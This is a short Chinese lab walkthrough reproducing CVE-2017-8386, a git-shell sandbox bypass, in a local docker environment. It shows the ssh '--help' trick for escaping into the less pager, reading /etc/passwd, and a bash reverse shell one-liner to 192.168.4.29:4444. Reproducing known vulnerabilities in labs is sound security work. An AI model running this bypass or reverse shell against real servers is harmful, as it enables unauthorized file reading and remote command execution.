前言
GIT (分布式版本控制系统),是一个开源的分布式版本控制系统,可以有效、高速地处理从很小到非常大的项目版本管理。也是Linus Torvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件
CVE-2017-8386_ GIT-SHELL 沙盒绕过
漏洞原理
GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。
参考链接:
- https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/
- https://www.leavesongs.com/PENETRATION/git-shell-cve-2017-8386.html
漏洞环境
#192.168.4.10_ubuntu
编译及运行测试环境:
#docker-compose up -d
漏洞利用
为了不和docker母机的ssh端口冲突,容器的ssh端口设置成3322。本目录下生成了一个`id_rsa`,这是ssh的私钥,连接的时候请指定之。
在连接以前,需要先设置私钥的权限为0600:`chmod 0600 id_rsa`,否则连接可能失败。
正常连接其ssh服务`ssh -p 3322 -i id_rsa git@127.0.0.1`,会被git-shell给拦截,返回错误`fatal: unrecognized command ''`,并且连接被关闭。
使用--help技巧,连接目标并进入帮助页面:
```
ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"
```
按`shift`+e,读取任意文件:cat /etc/passwd
回到帮助页面,输入`!+命令`执行命令:
反弹shell
# !/bin/bash -i >& /dev/tcp/192.168.4.29/4444 0>&1